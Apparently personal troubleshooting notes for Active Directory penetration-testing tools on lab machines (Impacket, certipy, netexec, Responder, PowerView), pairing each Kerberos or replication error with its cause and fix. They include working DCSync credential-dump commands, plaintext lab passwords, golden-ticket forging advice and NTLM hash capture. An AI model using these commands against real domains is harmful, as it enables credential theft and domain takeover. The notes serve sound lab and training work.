KRB_AP_ERR_SKEW(Clock skew too great)
impacket-getST htb.local/svc-alfresco:s3rvice -spn cifs/forest.htb.local
Impacket v0.11.0 - Copyright 2023 Fortra
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Getting ST for user
Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
Cause: the local clock is out of sync with the DC. The KDC rejects requests whose timestamp differs from its own clock by more than the allowed skew (5 minutes by default on Windows), so sync the clock to the DC.
First turn off automatic time sync, otherwise NTP will pull the clock back:
sudo timedatectl set-ntp off
sudo rdate -n 10.10.10.161
[sudo] password for kali:
Sun Oct 29 01:52:35 EDT 2023
Alternatively, with ntpdate:
sudo apt install ntpdate
sudo ntpdate 172.16.0.106
After syncing, the request succeeds:
impacket-getST htb.local/svc-alfresco:s3rvice -spn cifs/forest.htb.local
Impacket v0.11.0 - Copyright 2023 Fortra
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Getting ST for user
[*] Saving ticket in svc-alfresco.ccache
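As an added example (not part of the original notes), a small pre-flight script that measures the skew against the DC from `ntpdate -q` output and says whether the Kerberos tooling above will fail with KRB_AP_ERR_SKEW before you run it. It assumes awk and ntpdate are available for the live check and that 300 seconds is the KDC's limit; the sample ntpdate output and the DC address in it are constructed.

```shell
#!/bin/sh
# kskew.sh: pre-flight clock-skew check before running Kerberos tooling.
# Added example, not part of the original notes. A KDC rejects an
# authenticator whose timestamp is more than the allowed skew off its own
# clock (300 s by default on Windows), which surfaces as KRB_AP_ERR_SKEW.
# Assumptions: awk is available; ntpdate is installed for the live check.

MAX_SKEW=300

# offset_from_ntpdate: read `ntpdate -q` output on stdin, extract the
# "offset" field (seconds, server clock minus local clock) from the first
# "server ..." line and print its absolute value as an integer.
offset_from_ntpdate() {
    awk -F'offset ' '/^server /{ split($2, a, ","); o = a[1] + 0; if (o < 0) o = -o; printf "%d\n", o; exit }'
}

# skew_ok SECONDS: succeed when the skew is within the Kerberos limit.
skew_ok() {
    [ "$1" -le "$MAX_SKEW" ]
}

# kskew_verdict SECONDS DC_IP: print the verdict and, on failure, the fix
# (disable NTP first, otherwise the next sync drags the clock back).
kskew_verdict() {
    if skew_ok "$1"; then
        echo "clock skew ${1}s: OK (limit ${MAX_SKEW}s)"
    else
        echo "clock skew ${1}s: too large, expect KRB_AP_ERR_SKEW; fix with:"
        echo "  sudo timedatectl set-ntp off && sudo ntpdate $2"
        return 1
    fi
}

# kskew_check DC_IP: live check against a DC (needs network and ntpdate).
kskew_check() {
    skew=$(ntpdate -q "$1" | offset_from_ntpdate)
    [ -n "$skew" ] || { echo "no offset line from ntpdate -q $1" >&2; return 1; }
    kskew_verdict "$skew" "$1"
}

# Constructed sample of `ntpdate -q 10.10.10.161` output, as if the local
# clock were about 72 minutes ahead of the DC.
SAMPLE='server 10.10.10.161, stratum 2, offset -4312.618231, delay 0.03119
29 Oct 01:52:35 ntpdate[4242]: adjust time server 10.10.10.161 offset -4312.618231 sec'

# sample_skew: run the parser over the constructed sample.
sample_skew() {
    printf '%s\n' "$SAMPLE" | offset_from_ntpdate
}

# Offline demo; against a real DC use: kskew_check 10.10.10.161
kskew_verdict "$(sample_skew)" 10.10.10.161 || :
```

Run `kskew_check <DC IP>` before getST/secretsdump; if it reports a skew over the limit, apply the two commands it prints and re-run it until it says OK.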
Using net in cmd
Group names containing spaces must be quoted: double quotes in cmd, single or double quotes in PowerShell. Without spaces the quotes can be omitted.
powershell net group 'Exchange Windows Permissions'
net group "Exchange Windows Permissions"

ERROR_DS_DRA_BAD_DN
impacket-secretsdump htb.local/test1:'Test@123'@10.10.10.161
Impacket v0.11.0 - Copyright 2023 Fortra
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[-] DRSR SessionError: code: 0x20f7 - ERROR_DS_DRA_BAD_DN - The distinguished name specified for this replication operation is invalid.
[*] Something went wrong with the DRSUAPI approach. Try again with -use-vss parameter
[*] Cleaning up...
The account has no DCSync rights (it lacks the Replicating Directory Changes / Replicating Directory Changes All extended rights on the domain object). The suggested -use-vss fallback needs local administrator on the DC, and the earlier rpc_s_access_denied suggests this account does not have that either.
KDC_ERR_WRONG_REALM
RFC 6806 defines this error. In practice it is usually a DNS or client-side Kerberos configuration problem: check the KDC host entry and the FQDN/realm settings (the realm must match the domain name and the KDC must be named by its FQDN).
RFC 6806 - Kerberos Principal Name Canonicalization and Cross-Realm Referrals
Disable NTLM Authentication
When NTLM authentication is disabled, many tools break until they are switched to Kerberos: pass -k and name the DC by NetBIOS name or FQDN with -dc-host (Impacket says so explicitly below), and LDAP clients must bind with signing or over TLS, since a plain simple bind is rejected.
impacket-GetUserSPNs scrm.local/ksimpson:ksimpson -k
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Getting machine hostname
[-] The SMB request is not supported. Probably NTLM is disabled. Try to specify corresponding NetBIOS name or FQDN as the value of the -dc-host option
windapsearch -u ksimpson -p ksimpson -d scrm.local user-spns
FATAL[2023-11-22T08:22:32-05:00] LDAP Result Code 8 "Strong Auth Required": 00002028: LdapErr: DSID-0C090259, comment: The server requires binds to turn on integrity checking if SSL\TLS are not already active on the connection, data 0, v4563 package=windapsearch
windapsearch --secure -u ksimpson -p ksimpson -d scrm.local -m user-spns
FATAL[2023-11-22T08:25:12-05:00] unable to read LDAP response packet: read tcp 10.10.16.16:50890->10.10.11.168:636: read: connection reset by peer package=windapsearch
ldapsearch -x -H ldap://10.10.11.168 -w ksimpson -b "cn=users,dc=scrm,dc=local" -D 'ksimpson@scrm.local'
ldap_bind: Strong(er) authentication required (8)
additional info: 00002028: LdapErr: DSID-0C090259, comment: The server requires binds to turn on integrity checking if SSL\TLS are not already active on the connection, data 0, v4563
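KDC_ERR_WRONG_REALM above and the NTLM-disabled failures here come back to the client's Kerberos setup: the realm must be the domain name in upper case, the KDC must be reachable by its FQDN, and the host passed to -dc-host or used as the target must be the DC itself rather than the bare domain. As an added example (not from the original notes, Impacket or windapsearch), the script below generates that configuration and checks a target name; dc1.scrm.local and 10.10.11.168 are assumed values for the DC.

```shell
#!/bin/sh
# kerbprep.sh: client-side Kerberos setup for a domain where NTLM is off.
# Added example, not from the original notes, Impacket or windapsearch.
# Assumed values: the DC is dc1.scrm.local at 10.10.11.168.

# realm_of DOMAIN: the Kerberos realm is the DNS domain name in upper case;
# a lower-case or mismatched realm is one source of KDC_ERR_WRONG_REALM.
realm_of() {
    printf '%s\n' "$1" | tr '[:lower:]' '[:upper:]'
}

# short_host FQDN: NetBIOS-style short name (first label).
short_host() {
    printf '%s\n' "${1%%.*}"
}

# hosts_line IP DC_FQDN: /etc/hosts entry so the DC's FQDN resolves without
# relying on the lab DNS.
hosts_line() {
    printf '%s %s %s\n' "$1" "$2" "$(short_host "$2")"
}

# target_is_dc_host TARGET DOMAIN: succeed only when TARGET is a host inside
# DOMAIN, not the bare domain name. Service tickets are bound to a host SPN
# (cifs/<host>, ldap/<host>), so -dc-host and the connection target must be
# the DC itself.
target_is_dc_host() {
    case "$1" in
        "$2")    return 1 ;;
        *."$2")  return 0 ;;
        *)       return 1 ;;
    esac
}

# krb5_conf DOMAIN DC_FQDN: minimal /etc/krb5.conf with DNS lookups off, so
# the realm and KDC come from this file rather than from SRV records.
krb5_conf() {
    domain=$1; dc=$2; realm=$(realm_of "$domain")
cat <<EOF
[libdefaults]
    default_realm = $realm
    dns_lookup_realm = false
    dns_lookup_kdc = false

[realms]
    $realm = {
        kdc = $dc
        admin_server = $dc
    }

[domain_realm]
    .$domain = $realm
    $domain = $realm
EOF
}

# Offline demo with the assumed values.
hosts_line 10.10.11.168 dc1.scrm.local
krb5_conf scrm.local dc1.scrm.local
if target_is_dc_host dc1.scrm.local scrm.local; then
    echo "dc1.scrm.local: use as -dc-host / target"
fi
if ! target_is_dc_host scrm.local scrm.local; then
    echo "scrm.local: bare domain name, expect SPN/target mismatches"
fi
```

With a TGT in KRB5CCNAME (from impacket-getTGT), the Impacket tools then take `-k -dc-host dc1.scrm.local`, and ldapsearch can satisfy the "Strong Auth Required" bind policy with `-Y GSSAPI -H ldap://dc1.scrm.local` (integrity is negotiated in the SASL layer) or by binding over ldaps:// on 636 instead of the plain simple bind shown above.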
certipy-ad errors
certipy-ad find -u Ryan.Cooper@sequel.htb -p NuclearMosquito3 -dc-ip 10.10.11.202
Fails under Python 3.11 (ly4k/Certipy issue #154); downgrading Python resolved it.
Got error: module 'enum' has no attribute '_decompose' · Issue #154 · ly4k/Certipy
AttributeError: 'NoneType' object has no attribute 'sort_order'
AttributeError: module 'enum' has no attribute '_decompose'
Unable to contact the server
get-aduser : Unable to contact the server. This may be because this server does not exist, it is currently down, or it does not have the Active Directory Web Services running.
Fix: Unable to Find a Default Server with Active Directory Web Services Running – TheITBros
On the DC, restart Active Directory Web Services (from a client, point the cmdlet at a DC that runs ADWS with -Server instead):
Restart-Service -Name ADWS -Verbose
KDC_ERR_PREAUTH_FAILED
If the username and password are definitely correct, the likely cause is a wrong FQDN or UPN: the domain/realm part of the principal does not match the account's actual domain.
Kerberos SessionError: KDC_ERR_PREAUTH_FAILED(Pre-authentication information was invalid)
DCSync
Working commands (Kerberos auth from a ccache, targeting the DC by its FQDN):
KRB5CCNAME=./test.ccache impacket-secretsdump cdc01.prod.corp1.com -k -no-pass
KRB5CCNAME=./test.ccache netexec smb prod.corp1.com --use-kcache --ntds
ERROR_DS_NAME_ERROR_NOT_UNIQUE
KRB5CCNAME=./test.ccache impacket-secretsdump cdc01.prod.corp1.com -k -no-pass -just-dc-user administrator
[-] ERROR_DS_NAME_ERROR_NOT_UNIQUE: Name translation: Input name mapped to more than one output name.
[*] You just got that error because there might be some duplicates of the same name. Try specifying the domain name for the user as well. It is important to specify it in the form of NetBIOS domain name/user (e.g. contoso/Administratror).
Fix: qualify the user with the NetBIOS domain name, i.e. -just-dc-user <NETBIOS domain>/administrator.
STATUS_USER_SESSION_DELETED
KRB5CCNAME=./test.ccache impacket-secretsdump prod.corp1.com -k -no-pass -debug
[+] SMBConnection didn't work, hoping Kerberos will help (SMB SessionError: code: 0xc0000016 - STATUS_MORE_PROCESSING_REQUIRED - {Still Busy} The specified I/O request packet (IRP) cannot be disposed of because the I/O operation is not complete.)
[-] Policy SPN target name validation might be restricting full DRSUAPI dump. Try -just-dc-user
[+] Exiting NTDSHashes.dump() because SMB SessionError: code: 0xc0000203 - STATUS_USER_SESSION_DELETED - The remote user session has been deleted.
Note the target: this run used the domain name (prod.corp1.com), whereas the working commands above used the DC's FQDN (cdc01.prod.corp1.com).
KRB_AP_ERR_MODIFIED
KRB5CCNAME=./test.ccache impacket-secretsdump prod.corp1.com -k -no-pass -just-dc-user administrator -debug
[+] SMBConnection didn't work, hoping Kerberos will help (SMB SessionError: code: 0xc0000016 - STATUS_MORE_PROCESSING_REQUIRED - {Still Busy} The specified I/O request packet (IRP) cannot be disposed of because the I/O operation is not complete.)
…
[-] Kerberos SessionError: KRB_AP_ERR_MODIFIED(Message stream modified)
KRB_AP_ERR_MODIFIED means the server could not decrypt or validate the service ticket: the ticket was issued for an SPN whose key does not belong to the host that received it. Here, too, the target was the domain name (prod.corp1.com) rather than the DC's FQDN; using cdc01.prod.corp1.com as in the working commands avoids it.
Exception calling “FindAll” with “0” argument(s)
Errors you hit when using PowerView, such as:
- The specified domain either does not exist or could not be contacted
- The server is not operational
First add the -Server parameter (or -DomainController; the two are equivalent) so PowerView talks to a DC by name.
Also add the -Credential parameter: a session opened through evil-winrm usually carries no reusable credentials (it is a network logon), so PowerView cannot authenticate to the DC on its own.
KDC_ERR_TGT_REVOKED
[-] Kerberos SessionError: KDC_ERR_TGT_REVOKED(TGT has been revoked)
fortra/impacket PR #1545 (Ticketer: Added extra-pac implementation, by 0xdeaddood) is the fix, but on Kali as of 2024-08-04 the error still occurred; it is unclear whether the packaged version includes it.
Issue #1605 (Ticketer Sapphire ticket issue) shows how to diagnose a ticket: inspect it with describeTicket.py.
Issue #1601 (KDC_ERR_TGT_REVOKED when using golden ticket from ticketer.py) gives the workaround.
Tickets forged with the krbtgt AES256 key succeed.
Also, since update KB5008380 Windows uses a new PAC structure with new checks: the KDC now verifies that the user actually exists and has the correct RID. So the ticket must be forged for an existing user with that user's real RID, using the -user-id flag mentioned above.
Responder Error starting
sudo responder -I tun0
Error starting TCP server on port 53, check permissions or other servers running.
sudo systemctl stop systemd-resolved
(systemd-resolved's stub resolver holds port 53; stopping it frees the port but also disables local DNS resolution until it is started again.)
Skipping
Skipping previously captured hash for flight.htb\c.bum
So to fix that you have to restart Responder and pass it the -v flag and that will show the hash every time.
The Complete Responder & NTLM Relay Attack Tutorial - ethicalhackingguru.com
netexec/crackmapexec
When an attack only works with the target given as its FQDN, --kdcHost alone is not enough: you also need -k so that Kerberos authentication is used.